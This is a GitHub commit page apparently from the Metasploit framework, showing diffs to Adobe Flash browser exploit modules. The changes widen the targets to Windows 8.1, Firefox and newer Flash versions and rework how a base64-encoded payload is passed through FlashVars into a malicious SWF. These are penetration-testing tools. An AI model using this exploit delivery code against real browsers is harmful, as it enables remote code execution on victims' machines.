Skip to content

Commit 02181ad

Browse files
committed
1 parent 23df66b commit 02181ad

File tree

5 files changed

+14
-196
lines changed

5 files changed

+14
-196
lines changed

data/exploits/CVE-2014-0556/msf.swf

100755100644
2.93 KB
Binary file not shown.

external/source/exploits/CVE-2014-0556/Main.as

Lines changed: 0 additions & 185 deletions
This file was deleted.

modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@
66
require 'msf/core'
77

88
class Metasploit3 < Msf::Exploit::Remote
9-
Rank = NormalRanking
9+
Rank = GreatRanking
1010

1111
include Msf::Exploit::Remote::BrowserExploitServer
1212

modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@
66
require 'msf/core'
77

88
class Metasploit3 < Msf::Exploit::Remote
9-
Rank = NormalRanking
9+
Rank = GreatRanking
1010

1111
include Msf::Exploit::Remote::BrowserExploitServer
1212

modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb

Lines changed: 12 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -6,9 +6,8 @@
66
require 'msf/core'
77

88
class Metasploit3 < Msf::Exploit::Remote
9-
Rank = NormalRanking
9+
Rank = GreatRanking
1010

11-
include Msf::Exploit::Powershell
1211
include Msf::Exploit::Remote::BrowserExploitServer
1312

1413
def initialize(info={})
@@ -47,9 +46,12 @@ def initialize(info={})
4746
'BrowserRequirements' =>
4847
{
4948
:source => /script|headers/i,
50-
:os_name => OperatingSystems::Match::WINDOWS_7,
51-
:ua_name => Msf::HttpClients::IE,
52-
:flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') },
49+
:os_name => lambda do |os|
50+
os =~ OperatingSystems::Match::WINDOWS_7 ||
51+
os =~ OperatingSystems::Match::WINDOWS_81
52+
end,
53+
:ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
54+
:flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.179') },
5355
:arch => ARCH_X86
5456
},
5557
'Targets' =>
@@ -82,17 +84,18 @@ def on_request_exploit(cli, request, target_info)
8284
def exploit_template(cli, target_info)
8385
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
8486
target_payload = get_payload(cli, target_info)
85-
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
86-
b64_payload = Rex::Text.encode_base64(psh_payload)
87+
b64_payload = Rex::Text.encode_base64(target_payload)
88+
platform_id = 'win'
89+
os_name = target_info[:os_name]
8790

8891
html_template = %Q|<html>
8992
<body>
9093
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
9194
<param name="movie" value="<%=swf_random%>" />
9295
<param name="allowScriptAccess" value="always" />
93-
<param name="FlashVars" value="sh=<%=b64_payload%>" />
96+
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
9497
<param name="Play" value="true" />
95-
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
98+
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
9699
</object>
97100
</body>
98101
</html>

0 commit comments

Comments
 (0)